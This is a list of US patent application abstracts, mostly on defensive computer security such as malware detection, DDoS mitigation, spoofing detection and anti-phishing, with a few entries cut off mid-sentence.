20100269174SYSTEMS AND METHODS FOR GENERATING A DNS QUERY TO IMPROVE RESISTANCE AGAINST A DNS ATTACK - The present solution provides systems and methods for generating DNS queries that are more resistant to being compromised by attackers. To generate the transaction identifier, the DNS resolver uses a cryptographic hash function. The inputs to the hash function may include a predetermined random number, the destination IP address of the name server to be queried, and the domain name to be queried. Because of the inclusion of the name server's IP address in the formula, queries for the same domain name to different name servers may have different transaction identifiers, preventing an attacker from observing a query and predicting the identifiers for other queries. Additional entropy may be provided for generating transaction identifiers by including the port number of the name server and/or a portion of the domain name as inputs to the hash function. If it is determined that the responding server may preserve capitalization in its responses, the upper and lower case characters may be salted within the domain name to provide additional entropy in generating transaction identifiers.10-21-2010
20090320129SECURE CONTROL FLOWS BY MONITORING CONTROL TRANSFERS - A cross-module detection system and method for detecting and monitoring control flow transfers between software modules in a computer system. The system and method detect and monitor control flows entering and exiting the software modules. For a particular module, a checking model is extracted from the binary file of that module. In addition, a relaxed shadow stack is generated. If the module is an original module, meaning that the control flow originated from that module, then the checking model is used to check the validity of the control flow transfer. Otherwise, the relaxed shadow stack is used. An interception module is used to intercept and terminate invalid control flow transfers. If an invalid control flow transfer is detected, then the transfer is terminated. Otherwise, the control flow transfer is allowed to continue.12-24-2009
20090320128SYSTEM MANAGEMENT INTERRUPT (SMI) SECURITY - A system management interrupt (SMI) security system includes one or more subsystems to define a first variable using advanced configuration and power interface (ACPI) source language (ASL) code, define a second variable using system management mode (SMM) code, generate a first soft SMI to generate a random value, update the first and second variables with the generated value, generate a second SMI to perform an operation, compare the values of the first and second variables and perform the operation in response to the first and second variables having a value substantially the same as one another.12-24-2009
20090165134Look ahead of links/alter links - A computationally-implemented method comprising retrieving at least a portion of data from a data source, determining an effect of the data, determining an acceptability of the effect of the data at least in part via a virtual machine representation of at least a part of a real machine having one or more end-user specified preferences and providing at least one data display option based on the determining acceptability of the effect of the data.06-25-2009
20090144824Integrated Protection Service Configured to Protect Minors - An integrated system configured to provide a safe environment for a minor is described. The system includes a training segment, a set-up segment, and a consulting segment. The training segment is configured to train parents and/or guardians of minors about dangers including those involving the internet. The set-up system is configured to help the parents or guardians establish tracking of the minor's internet activity. The consulting segment is configured to providing initial and ongoing consulting regarding particular threats or concerns associated with safety of the minor.06-04-2009
20090113546MEMORY SYSTEM FOR SENSING ATTACK - A memory system includes a main memory, a sub-memory, a controller, first and second data readers and a comparator. The main memory stores data and the sub-memory stores data extracted from the data stored in the main memory for detection of an attack. The controller controls operations of the memory system through interfacing with a host. The first data reader is configured to read first data from the main memory based on address information from the controller. The second data reader is configured to store information relating to second data stored in the sub-memory and to read the second data from the sub-memory based on address information from the controller which is the same as the address information received by the first data reader. The comparator compares the first data read by the first data reader with the second data read by the second data reader to detect the attack.04-30-2009
20090113545Method and System for Tracking and Filtering Multimedia Data on a Network - The method for identifying and filtering multimedia data consists of monitoring off-line, on a data transmission network, multimedia data with reference to reference multimedia data and using an on-line intervention module to intercept, query or listen to the multimedia data recognized on-line using formal data stored in a formal activation database generated during off-line monitoring using suspicious data obtained during a search for multimedia data on the network.04-30-2009
20100223668APPARATUS AND METHOD FOR MANAGING TERMINAL USERS - The present invention relates to an apparatus and method of managing terminal users that is capable of securely managing personal information and data of a user in a mobile terminal. An embodiment of the present invention provides an apparatus and method of managing terminal users that monitors whether a terminal of a user is abnormally used, including whether the terminal is not used over a predetermined period of time, to collect and check data, and, when it is determined that the terminal is abnormally used as a checked result, forces the user to log out. Therefore, a login situation of the user can be accurately recognized, and the internal operation of the terminal can be secured from external users to securely manage user data and improve security.09-02-2010
20120144480Using Virtual Table Protections to Prevent the Exploitation of Object Corruption Vulnerabilities - The subject disclosure is directed towards preventing the exploitation by malicious code of object state corruption vulnerabilities, such as use-after-free vulnerabilities. An object class is configured with a secret cookie in a virtual function table of the object, e.g., inserted at compile time. An instrumentation check inserted in the program code evaluates the secret cookie to determine whether the object state has been corrupted before object access (e.g., a call to one of the object's methods) is allowed. If corrupted, access to the object is prevented by the instrumentation check. Another instrumentation check may be used to determine whether the object's virtual table pointer points to a location outside of the module that contains the legitimate virtual function table; if so, object access is prevented.06-07-2012
20080244740BROWSER-INDEPENDENT EDITING OF CONTENT - A system for editing a web page includes receiving the web page in a normalized form, where the normalized form is independent of any browser form. The page may be displayed to a user, where the web page has been translated from the normalized form to a browser-dependent form, and editable by the user. The web page may be a Wiki or collaborate web page. Overall, described in detail above is a unified editing system for editing a collaborative web page is described. The collaborative web page having a normalized form that is independent of any browser form. The system displays the collaborative web page that has been translated from the normalized form to a browser-dependent form to a user, wherein the browser-dependent form of the collaborative web page is editable by a user. The unified editing system receives from the user the edited collaborative web page in the browser-dependent form. Other features and aspects of the invention are also disclosed.10-02-2008
20110113490TECHNIQUES FOR PREVENTING ATTACKS ON COMPUTER SYSTEMS AND NETWORKS - Techniques for detecting and responding to attacks on computer and network systems including denial-of-service (DoS) attacks. A packet is classified as potentially being an attack packet if it matches an access control list (ACL) specifying one or more conditions. One or more actions may be performed responsive to packets identified as potential attack packets. These actions may include dropping packets identified as potential attack packets for a period of time, rate limiting a port over which the potential attack packets are received for a period of time, and other actions.05-12-2011
20080209550Method For Detecting and Reacting Against Possible Attack to Security Enforcing Operation Performed by a Cryptographic Token or Card - The approach defines a protection mechanism against attacks to a security enforcing operation performed by cryptographic token or smart card. It is based on an attack detector which signals the main elaboration or processing system regarding a potential attack situation. The approach addresses SIM cloning problems of telecommunications operators who use old and breakable cryptographic algorithms such as the COMP-128 and do not want to invest in updating the network authentication systems with more resistant authentication cryptographic algorithms. The approach may be applicable to the typical telecommunications operator in an emerging market that does not use state of the art technology.08-28-2008
20080229417METHOD FOR CONTROLLING RISK IN A COMPUTER SECURITY ARTIFICIAL NEURAL NETWORK EXPERT SYSTEM - A computer implemented method, data processing system, and computer program product for monitoring system events and providing real-time response to security threats. System data is collected by monitors in the computing system. The expert system of the present invention compares the data against information in a knowledge base to identify a security threat to a system resource in a form of a system event and an action for mitigating effects of the system event. A determination is made as to whether a threat risk value of the system event is greater than an action risk value of the action for mitigating the system event. If the threat risk value is greater, a determination is made as to whether a trust value set by a user is greater than the action risk value. If the trust value is greater, the expert system executes the action against the security threat.09-18-2008
20080229416Computer Network Virus Protection System and Method - A network is protected from viruses through the use of a sacrificial server, which may be physical or virtual. Any executable programs or other suspicious parts of incoming e-mail messages are forwarded to a sacrificial server, where they are converted to non-executable format such as Adobe Acrobat PDF and sent to the recipient. The sacrificial server is then checked for virus activity. After the execution is completed, the sacrificial server is rebooted.09-18-2008
20100293615METHOD AND APPARATUS FOR DETECTING THE MALICIOUS BEHAVIOR OF COMPUTER PROGRAM - A method and an apparatus for detecting malicious behavior of a computer program are disclosed. The method and apparatus analyze behavior characteristics of a malicious program using the concept of a monitored process set. The method comprises: monitoring an action executed by the computer program; searching for a process set associated with the monitored action within a library of monitored process sets, the process set including information of suspicious processes correlated with each other in creating relationships; and if the process set associated with the monitored action is found, judging whether the monitored action belongs to malicious behavior by correlation analysis based on information recorded in the process set found.11-18-2010
20090038008MALICIOUS CODE DETECTION - In a system where an indirect control flow instruction requires a CPU to consult a first memory address, in addition to what is encoded in the instruction itself, for program execution, a method is provided to determine if the first memory address contains a valid or plausible value. The first memory address is compared to an expected or predicted memory address. A difference between the expected or predicted memory address and the first memory address causes an evaluation of any program code about to be executed. The evaluation of code determines whether or not a malicious attack is occurring, or being attempted, that might affect proper operation of the system or program.02-05-2009
20090038009Information Processing Device That Verifies A Computer Program, And Gaming Machine - An apparatus for processing information includes a memory device and a controller. The controller is configured to: access to a memory area in the memory device in which information related to a location of data including a computer program is stored; store contents of the memory area as a first inspection code into a first memory area of the memory device; at predetermined timing, access to a memory area in the memory device in which latest information is stored; store contents of the memory area as a second inspection code into a second memory area; compare the first and the second inspection codes; if the second inspection code does not agree with the first inspection code, output an error signal indicating inconsistency between the first and the second inspection codes; and if the second inspection code agrees with the first inspection code, perform verification of the computer program.02-05-2009
20090070870Detecting network attacks - Described is a technique for detecting attacks on a data communications network having a plurality of addresses for assignment to data processing systems in the network. The technique involves identifying data traffic on the network originating at any assigned address and addressed to any unassigned address. Any data traffic so identified is inspected for data indicative of an attack. On detection of data indicative of an attack, an alert signal is generated.03-12-2009
20090070869PROXY ENGINE FOR CUSTOM HANDLING OF WEB CONTENT - Processes and techniques for protecting web users from malicious executable code are described. A proxy engine is implemented that intercepts communications between a web browser and a script engine. The proxy engine can invoke a variety of custom event handlers that are configured to handle specific types of events (e.g., script events) that occur in the processing of web content. A script shield event handler detects the presence of script in pre-defined script-free zones and prevents the script from being executed on a user's device.03-12-2009
20100293614Method, Apparatus, and Computer Program for Providing Application Security - In response to an initialization of the apparatus, a validation value is calculated for each of a plurality of application executable files and the validation values are stored in a protected memory portion of random access memory. An attempt to launch an application on the apparatus is determined, and a current validation value for an executable file associated with the application is calculated. The current validation value is compared with a corresponding one of the stored validation values, and launching of the application is regulated based on results of the comparison.11-18-2010
20130133063TUNNELING-BASED METHOD OF BYPASSING INTERNET ACCESS DENIAL - The tunneling-based method of bypassing Internet access denial allows for the re-routing of communication between a local system and a destination system when the local system's Internet Protocol (IP) address has been blocked by a malicious higher-tier Internet service provider (ISP). If it is determined that the local system is blocked from communicating with the destination system, then it is determined if a malicious higher-tier ISP is responsible for the blockage of service. If the local system is blocked by the ISP, then the ISP is identified and communication is established between the local system and a neighboring system that is not blocked by the ISP. Finally, communications are then transmitted from the local system to the destination system, through the established tunnel, by first transmitting from the local system to the neighboring system, and then transmitting from the neighboring system through the ISP to the destination system.05-23-2013
20100306844APPLICATION INFORMATION TAMPERING MONITORING APPARATUS AND METHOD - A tampering monitoring apparatus (12-02-2010
20130139252SECURING NETWORK COMMUNICATIONS FROM BLIND ATTACKS WITH CHECKSUM COMPARISONS - Blind attacks on a protocol connection, such as a TCP connection, are prevented by inserting checksums computed during protocol connection establishment handshake into data sent through the connection and invalidating data sent through the connection that lacks the protocol setup information checksums. Reset attacks are prevented by invalidating reset requests unless a master checksum computed from the protocol setup information checksums is included with the reset request. Checksums computed from protocol setup information have improved robustness by including a random number with the protocol setup information.05-30-2013
20130139253Deceptive indicia notification in a communications interaction - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for monitoring deceptive indicia in communications content may implement operations including, but not limited to: receiving one or more signals associated with communication content provided by a first participant in a communications interaction; detecting one or more indicia of deception associated with the one or more signals associated with the communication content; and providing a notification associated with the one or more indicia of deception associated with the communication content to a second participant in the communications interaction receiving the communication content.05-30-2013
20130139254Deceptive indicia notification in a communications interaction - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for monitoring deceptive indicia in communications content may implement operations including, but not limited to: receiving one or more signals associated with communication content provided by a participant in a communications interaction; detecting one or more indicia of deception associated with the one or more signals associated with the communication content; and providing a notification associated with the one or more indicia of deception associated with the communication content to the participant providing the communication content.05-30-2013
20130139255Detection of deceptive indicia masking in a communications interaction - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for detecting masking of deceptive indicia in communications content may implement operations including, but not limited to: receiving one or more signals associated with communications content provided by a first participant in a communications interaction; and detecting at least one indicia of a modification of the communications content associated with at least one indicia of deception by the first participant.05-30-2013
20130139256Deceptive indicia profile generation from communications interactions - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for generating deceptive indicia profiles may implement operations including, but not limited to: detecting one or more indicia of deception associated with one or more signals associated with communication content provided by a participant in a first communications interaction; detecting one or more indicia of deception associated with the one or more signals associated with communications content provided by the participant in a second communications interaction; and generating a deceptive indicia profile for the participant according to indicia of deception detected in the communications content provided by the participant in the first communications interaction and indicia of deception detected in the communications content provided by the participant in the second communications interaction.05-30-2013
20130139257Deceptive indicia profile generation from communications interactions - Systems, methods, computer-readable storage mediums including computer-readable instructions and/or circuitry for generating deceptive indicia profiles may implement operations including, but not limited to: detecting one or more indicia of deception associated with one or more signals associated with communication content provided by a participant in a first communications interaction; detecting one or more indicia of deception associated with one or more signals associated with communications content provided by the participant in a second communications interaction; generating a deceptive indicia profile for the participant according to indicia of deception detected in the communications content provided by the participant in the first communications interaction and indicia of deception detected in the communications content provided by the participant in the second communications interaction; and providing a notification associated with the deceptive indicia profile for the participant to the participant.05-30-2013
20130139259DECEPTIVE INDICIA PROFILE GENERATION FROM COMMUNICATIONS INTERACTIONS - Systems, methods, computer-readable storage mediums and/or circuitry for generating deceptive indicia profiles may implement: detecting one or more indicia of deception associated with one or more signals associated with communication content provided by a participant in a first communications interaction; detecting one or more indicia of deception associated with one or more signals associated with communications content provided by the participant in a second communications interaction; generating a deceptive indicia profile for the participant according to indicia of deception detected in the communications content provided by the participant in the first communications interaction and indicia of deception detected in the communications content provided by the participant in the second communications interaction; and detecting one or more indicia of deception associated with one or more signals associated with communications content provided by the participant in a third communications interaction according to the deceptive indicia profile for the participant.05-30-2013
20110010771DETECTING A DENIAL OF SERVICE ATTACK - A plurality of ranging processes are performed to monitor a status of a wireless link associated with a device identifier. A ranging request that includes the device identifier and a message skip indicator is received. It is determined that the device identifier is already associated with the wireless link. A duration since a previously completed ranging process is determined. Based on the duration, and the message skip indicator, it is determined whether to respond to the ranging request.01-13-2011
20090138967Windows registry modification verification - A method and system is provided by which unauthorized changes to the registry may be detected and that provides the capability to verify whether registry, or other system configuration data, changes that occur on a computer system are undesirable or related to possible malware attack before the changes become effective or are saved on the system. A method for verifying changes to system configuration data in a computer system comprises generating an identifier representing an entry in the system configuration data, packaging the identifier, and sending the packaged identifier to a client for verification. The identifier may be generated by hashing the first portion of the entry and the second portion of the entry to generate the identifier, or by filtering the first portion of the entry and hashing the filtered first portion of the entry and the second portion of the entry to generate the identifier.05-28-2009
20100333202METHOD AND DEVICE FOR DEFENDING AGAINST ATTACKS TO SYSTEMS COMPRISING A PLUG & PLAY FUNCTION - Method for recognizing attacks to at least one interface of a computer system, in particular an automated self-service machine, comprising: monitoring the interface in order to determine changes at the interface; if changes occur, the change is used to determine the probability that an unallowed attack is occurring at the interface; if the probability is beyond a defined threshold, defensive maneuvers are introduced.12-30-2010
20100205669O-TOUCH AND 1-TOUCH TECHNIQUES FOR IMPROVING THE AVAILABILITY OF COMPUTER PROGRAMS UNDER PROTECTION WITHOUT COMPROMISING SECURITY - Protected software, such as an application and/or DLL, is monitored by protective software to guard against attacks, while distinguishing spurious, benign events from attacks. In a 1-touch approach, the protected software is monitored in a testing environment to detect spurious, benign events caused by, e.g., incompatibility or interoperability problems. The spurious events can be remediated in different ways, such as by applying a relaxed security policy. In a production mode, or 0-touch mode, when the protected software is subject to attacks, the corresponding remediation can be applied when the spurious events are again detected. Security events which occur in production mode can also be treated as benign when they occur within a specified time window. The applications and/or DLLs can further be classified according to whether they are known to have bad properties, known to be well-behaved, or unknown. Appropriate treatment is provided based on the classification.08-12-2010
20100205668APPARATUS AND METHOD FOR SPAM CONFIGURATION - An apparatus and a method for spam registration in a portable terminal are provided. The method includes determining whether there is a spam registration request for a number, determining whether spam registration prohibit condition not to register the number as spam is satisfied when there is the spam registration request for the number and not registering the number as spam when the spam registration prohibit condition is satisfied.08-12-2010
20100333201SYSTEM, METHOD, AND PROGRAM FOR DETERMINING VALIDITY OF STRING - A computer-implemented method, program product, and system for determining the validity of a string generated by a computer programming language program. The method includes: abstracting a constraint between variables extracted from a source code for a programming language, describing the constraint in M2L, and storing the constraint; and evaluating the validity of the string on an M2L solver on the basis of the constraint and a M2L specification to determine whether the string is safe or unsafe.12-30-2010
20100333200METHOD AND APPARATUS FOR SPAM MESSAGE DETECTION - A method, apparatus and computer program product for spam message detection. The method includes collecting time domain transmission characteristic of a message source; computing frequency domain transmission characteristic of the message source with the time domain transmission characteristic of the message source; and identifying the message source to be a spammer in response to the frequency domain transmission characteristic of the message source satisfying predefined criteria; wherein the steps of the method are carried out using a computer device. An apparatus and computer program product for carrying out the above method is also provided.12-30-2010
20100333199Method and system for scanning a computer system for sensitive content - A computer-implemented method for scanning a computer system for sensitive data. A scan manager manages a scan of files of a second computer. The scan manager receives a request to scan and identify files stored on the second computer based on at least one category of sensitive data. The scan manager receives scan report recipient information and generates a user profile based on the at least one category and the recipient information. The scan manager makes the user profile available to a category server for use in creating a scan profile defining the scan criteria and deploys a scan agent to a computer to conduct the scan based on the scan profile. When the scan is complete and upon creation of the scan report, the scan manager makes the scan report available to the intended recipients.12-30-2010
20100242111Methods and apparatus providing computer and network security utilizing probabilistic policy reposturing - A system defines at least one key event to be monitored by at least one agent, and creates a graphical model for the at least one key event. The system observes the at least one key event. The system infers a degree of attack on the computer system based on an observation of the at least one key event in conjunction with a result of an effect the at least one key event has on the graphical model. The system then adjusts a security policy based on an output of the graphical model.09-23-2010
20100242109METHOD AND SYSTEM FOR PREEMPTIVE SCANNING OF COMPUTER FILES - In embodiments of the present invention improved capabilities are described for reducing computer file access time associated with on-access scanning through predictive preemptive scanning, where the prediction may be enabled through the development and use of a file access performance cost mapping of a computing facility's file system. In a first step, file access information describing a pattern of each of a plurality of computer files that have been accessed in a computer file system may be collected. In a second step, the file access information may be processed to generate a file access performance cost statistic for each of the plurality of computer files, where the file access performance cost statistic may be a measure of the time aggregate effect on the computing facility's system performance associated with the access of the file. In a third step, the file access performance cost statistic may be maintained for each of the plurality of files accessed by the computing facility. In a fourth step, the file access performance cost mapping of the computing facility's file system relating to the plurality of computer file may be generated, where the file access performance cost mapping may provide an indication of which of the plurality of files in the file system produce the greatest time aggregate file access effect based on the computing facility's system performance. Finally, in a fifth step, files from the computer file system may be pre-scanned based on the file access performance cost mapping. In embodiments, pre-scanning may access at least one of the plurality of files for scanning prior to the file being called for a use, such as by an operating system, an application, a utility program, and the like. The step of pre-scanning may be performed during periods of low computing facility processing activity, and may result in a reduced need to scan the computer file when the computer file is accessed for use.09-23-2010
20100235909System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Velocity Analysis - A system and software for identifying the change of user behavior on a website includes analyzing the actions of users on a website comprising a plurality of fields or input parameters that identify the actions performed on a website including fields related to previous actions by that user or other users of the website. The fields or input parameters are represented in a vector format where vectors represent different sessions of activity on the website, pages of the website, users of the website, or other attributes of the use of a website. Analysis is performed to determine if new sessions are similar or dissimilar to previously known sessions and if a session is converging or diverging from known sessions based on the velocity and direction of the velocity of the vectors in the vector space.09-16-2010
20100235911SYSTEMS, METHODS, AND COMPUTER READABLE MEDIA FOR DETECTING AND MITIGATING ADDRESS SPOOFING IN MESSAGING SERVICE TRANSACTIONS - Systems, methods, and computer readable media for detecting and mitigating address spoofing in messaging service transactions are disclosed. A messaging service firewall (MSF) separate from a short message service center (SMSC) receives a mobility management reply message (MMR) that is sent by a mobile location register element in response to an associated mobility management query (MMQ) and that includes a serving switch identifier. The MSF allocates a global title address (GTA) from a pool of GTAs and stores a correlation between the allocated GTA and the originating SMSC. The MSF replaces the serving switch identifier in the MMR with the allocated GTA and routes the modified MMR. The MSF then receives a messaging service message (MSM) that is addressed to the allocated GTA and that includes the purported originating SMSC. If the purported originating SMSC does not match the SMSC to which the GTA is correlated, the MSM is discarded.09-16-2010
20110030055Detecting Spoofing in Wireless Digital Networks - Detecting spoofing in a digital network. Packets of information in a digital network using a shared medium contain a unique identifier for the device originating the packet. An individual device may be transmitting, or receiving, but not both. If a device receives a packet containing its unique identifier as the origin address, that packet must have been transmitted by another device, and a spoofing alert is raised.02-03-2011
20100180340Method and System for Filing and Monitoring Electronic Claim Submissions in Multi-Claimant Lawsuits - The invention relates to systems and methods for filing and monitoring electronic claim submissions in proceedings involving a large number of claimants, such as securities class action lawsuits, estate dissolutions, arbitrations, and bankruptcies. The systems and methods create an easy-to-use and convenient way for institutions and individual claimants to register their claim relief upon judgment or settlement.07-15-2010
20110035801METHOD, NETWORK DEVICE, AND NETWORK SYSTEM FOR DEFENDING DISTRIBUTED DENIAL OF SERVICE ATTACK - A method for defending a distributed denial of service (“DDoS”) attack includes analyzing at least one of a running status of a server or a network data stream flowing to the server at the server side to detect whether a DDoS attack occurs on the server and notifying a data stream cleaner that the data stream cleaner needs to clean the network data stream flowing to the server, if the DDoS attack occurs on the server.02-10-2011
20090049549APPARATUS AND METHOD FOR DETECTION OF MALICIOUS PROGRAM USING PROGRAM BEHAVIOR - An apparatus and method of diagnosing whether a computer program executed in a computer system is a malicious program and more particularly, an apparatus and method of diagnosing whether a computer program is a malicious program using a behavior of a computer program, and an apparatus and method of generating malicious code diagnostic data is provided. The apparatus for diagnosing a malicious code may include a behavior vector generation unit which generates a first behavior vector based on a behavior signature extracted from a diagnostic target program; a diagnostic data storage unit which stores a plurality of second behavior vectors for a plurality of sample programs predetermined to be malicious or normal; and a code diagnostic unit which diagnoses whether the diagnostic target program is a malicious code by comparing the first behavior vector with the plurality of second behavior vectors.02-19-2009
20110088094System for efficiently handling cryptographic messages containing nonce values in a wireless connectionless environment without comprising security - A system for determining the validity of a received cryptographic message while ensuring for out-of-order messages is utilized to provide for secure communications among peers in a network. In particular, a secure communication module may be configured to accept the cryptographic message in response to a received nonce value of the received message is greater than the largest nonce value yet seen. Otherwise, when the received nonce value is not the largest nonce value yet seen, the secure communication module may be configured to compare the received nonce value with a nonce acceptance window. If the received nonce value falls outside the nonce acceptance window, the secure communication module may be further configured to reject the received message and assume that a replay attack has been detected. If the received nonce value falls within the nonce acceptance window, the secure communication module may be further configured to determine if the received nonce value has been seen before by comparing the received nonce value with a replay window mask. If the received nonce has been seen before, the secure communication module may be further configured to reject the received message and assume a replay attack. Otherwise, the secure communication module may be further configured to accept the message and add the received nonce value to the replay window mask.04-14-2011
20110119760CLASSIFICATION OF SOFTWARE ON NETWORKED SYSTEMS - A method and system for the classification of software in networked systems, includes: determining a software received by a sensor is attempting to execute on a computer system of the sensor; classifying the software as authorized or unauthorized to execute, and gathering information on the software by the sensor if the software is classified as unauthorized to execute. The sensor sends the information on the software to one or more actuators, which determine whether or not to act on one or more targets based on the information. If so, then the actuator sends a directive to the target(s). The target(s) updates its responses according to the directive. The classification of the software is definitive and is not based on heuristics or rules or policies and without any need to rely on any a priori information about the software.05-19-2011
20110131653SYSTEMS AND METHODS FOR MANAGING MESSAGES IN AN ENTERPRISE NETWORK - A protocol management system is capable of detecting certain message protocols and applying policy rules to the detected message protocols that prevent intrusion, or abuse, of a network's resources. In one aspect, a protocol message gateway is configured to apply policy rules to high level message protocols, such as those that reside at layer 7 of the ISO protocol stack.06-02-2011
20110131652TRAINED PREDICTIVE SERVICES TO INTERDICT UNDESIRED WEBSITE ACCESSES - Webcrawlers and scraper bots are detrimental because they place a significant processing burden on web servers, corrupt traffic metrics, use excessive bandwidth, excessively load web servers, create spam, cause ad click fraud, encourage unauthorized linking, deprive the original collector/poster of the information of exclusive rights to analysis and summarize information posted on their own site, and enable anyone to create low-cost Internet advertising network products for ultimate sellers. A scaleable predictive service distributed in the cloud can be used to detect scraper activity in real time and take appropriate interdictive access up to and including denial of service based on the likelihood that non-human agents are responsible for accesses. Information gathered from a number of servers can be aggregated to provide real time interdiction protecting a number of disparate servers in a network.06-02-2011
20110131651METHOD AND DEVICE FOR DETECTING A SPOOFING ATTACK IN A WIRELESS COMMUNICATION NETWORK - A method and device enables detecting a spoofing attack in a wireless communication network (06-02-2011
20110131650METHODS, DEVICES, SYSTEMS, AND COMPUTER PROGRAM PRODUCTS FOR EDGE DRIVEN COMMUNICATIONS NETWORK SECURITY MONITORING - An edge monitoring approach can be utilized to detect an attack which includes a plurality of relatively low bandwidth attacks, which are aggregated at a victim sub-network. The aggregated low bandwidth attacks can generate a relatively high bandwidth attack including un-solicited data traffic directed to the victim' so that the aggregated attack becomes more detectable at an edge monitor circuit located proximate to the victim. Related systems, devices, and computer program products are also disclosed.06-02-2011
20110126284CONTENT REPRODUCTION DEVICE, CONTENT REPRODUCTION DEVICE CONTROL METHOD, CONTENT REPRODUCTION PROGRAM, RECORDING MEDIUM, AND INTEGRATED CIRCUIT - A content playback device of the present invention includes a playback unit 05-26-2011
20090100517APPARATUS AND METHOD FOR MONITORING AND PROTECTING SYSTEM RESOURCES FROM WEB BROWSER - An apparatus and method for preventing an attempt to perform malicious activities using web browser weaknesses are provided. A file protection module monitors attempts to access at least one file resource when the web browser executes a program, and allows or denies access. A registry protection module monitors attempts to access at least one registry resource when the web browser executes a program, and allows or denies access. A process protection module monitors attempts to execute or terminate at least one process when the web browser executes a program, and allows or denies the execution or termination.04-16-2009
20110214179SECURE METHOD AND SYSTEM FOR COMPUTER PROTECTION - Attacks by computer viruses, worm programs, and other hostile software (‘malware’), have become very serious problems for computer systems connected to large communication networks such as the Internet. One potential defence against such attacks is to employ diversity—that is, making each copy of the attacked software different. However, existing diversity techniques do not offer sufficient levels of protection. The invention provides an effective diversity solution by applying tamper resistant software (TRS) encoding techniques, to the communications that take place between software components, with corresponding changes to the code handling those communications. These communications may include, for example, data passed between software routines via parameters or mutually accessible variables, light-weight messages, signals and semaphores passed between threads, and messages passed between software processes. Effective TRS encoding techniques include data-flow encoding and mass-data encoding techniques.09-01-2011
20110214178System and Method for Detecting and Evicting Malicious Vehicles in a Vehicle Communications Network - In a vehicle communication network, some vehicles may be used by attackers to send false information to other vehicles which may jeopardize the safety of other vehicles. Vehicles should be able to detect malicious communications activities and to mitigate the impact of malicious vehicles by evicting (eliminating) suspected malicious vehicles from the system. Evicting a vehicle is to ignore the messages sent from the vehicle for a specified time period. Voting and sacrifice principles are combined using a mathematical model based on the “Mafia Game”. The Mafia Game model focuses on the relative size of the group of attackers within a neighborhood necessary to dominate the entire network in the neighborhood (i.e., to eventually evict all the innocent vehicles).09-01-2011
20110214177System and Method for Avoiding and Mitigating a DDoS Attack - Described is a system and method for receiving a data packet including a destination address and a source address, the data packet corresponding to a port number, assigning an address risk value for the data packet based on the source address and a port risk value for the data packet based on the port number. The data packet is categorized into a community based on the source address, wherein the community is predefined by a user corresponding to the destination address, the community includes a utility value. The address risk value and the port risk value are compared to the utility value to yield a benefit coefficient and the data packet is treated based on the benefit coefficient.09-01-2011
20110126283System for Tracking Digital Information Over a Communications Network - A method for tracking digital files transmitted over the Internet by placing certain identifying indicia within a file, and monitoring selected sites through which Internet traffic is transmitted, to determine the source and destination of a transmission containing a file with particular identifying indicia. Identifying indicia (“ID”) is placed in the header of each digital file whose transmission over the Internet is to be monitored. A data communications monitoring device is installed at an Internet service provider's (ISP's) facility. The monitoring device intercepts packets received by the ISP. These intercepted packets are then examined to determine whether they contain an ID of interest. If a sought ID is found within the packet, the source and destination fields in the Internet Protocol (IP) header are logged, along with the ID and other information, in a database. The pertinent contents of the database are then periodically sent to the proprietors whose IDs were discovered in packets in transit across the Internet. A proprietor may then take appropriate steps to secure compensation for the unauthorized copies, or to prevent further dissemination thereof.05-26-2011
20090313698Method for protecting a packet-based network from attacks, and security border node - The invention relates to a security border node (12-17-2009
20090313696CALCULATING A PASSWORD STRENGTH SCORE BASED UPON CHARACTER PROXIMITY AND RELATIVE POSITION UPON AN INPUT DEVICE - A solution for computing password strength based upon layout positions of input mechanisms of an input device that entered a password. A password including an ordered sequence of at least two characters can be identified. A position of each of the characters of the sequence can be determined relative to a layout of an input device used for password entry. Each position can correspond to an input region (key) of the input device (keyboard). A proximity algorithm can generate a proximately score for the determined positions based upon a pattern produced by the positions given the layout of the input device. A password strength score can be computed based at least in part upon the proximity score.12-17-2009
20100132038System and Method for Computer Malware Detection - Disclosed are systems and methods for computer malware detection. The system is configured to emulate execution of a program code, monitor events of program execution, classify the monitored events as malicious or non-malicious, and collect information about unclassifiable events. The system further includes one or more analyst workstations configured to isolate a program analyst from external audiovisual stimuli. The workstation includes a video output device operable to display a list of unclassifiable events and event-related information to the program analyst and a user input device operable to receive analyst's physiological response indicative of whether the displayed list of unclassifiable events exhibits malicious behavior.05-27-2010
20100132037SYSTEM AND METHOD TO LOCATE A PREFIX HIJACKER WITHIN A ONE-HOP NEIGHBORHOOD - Method, system and computer-readable medium to locate a prefix hijacker of a destination prefix within a one-hop neighborhood on a network. The method includes generating one-hop neighborhoods from autonomous system (AS)-level paths of plural monitors to a destination prefix. The method also includes determining a suspect set of AS identifiers resulting from a union of the one-hop neighborhoods. The method further includes calculating a count and a distance associated with each AS identifier of the suspect set. The count indicates how often the AS identifier appeared in the one-hop neighborhoods. The distance indicates a total distance from the AS identifier to AS identifiers associated with the plural monitors. Yet further, the method includes generating a one-hop suspect set of AS identifiers from the suspect set that have highest counts and highest distances.05-27-2010
20090328211CONTROL FLOW DEVIATION DETECTION FOR SOFTWARE SECURITY - Provided are methods and systems for control flow deviation detection. Provided are methods for software security, comprising executing a software program, generating a run-time signature variable, updating the run-time signature variable as the software program executes, comparing the run-time signature variable with a pre-computed signature, and detecting a deviation in control flow of the software program based on the comparison between the run-time signature variable and the pre-computed signature.12-31-2009
20110247070ANTI-PHISHING PROTECTION - Anti-Phishing protection assists in protecting against phishing attacks. Any links that are contained within a message that has been identified as a phishing message are disabled. A warning message is shown when the phishing message is accessed. The first time a disabled link within the phishing message is selected a dismissible dialog box is displayed containing information about how to enable links in the message. After the user dismisses the dialog, clicking on a disabled link causes the warning message to flash drawing the user's attention to the potential severity of the problem. The links may be enabled by the user by selecting the warning message and choosing the appropriate option. Once the user enables the links, future displays of the message show the links as enabled.10-06-2011
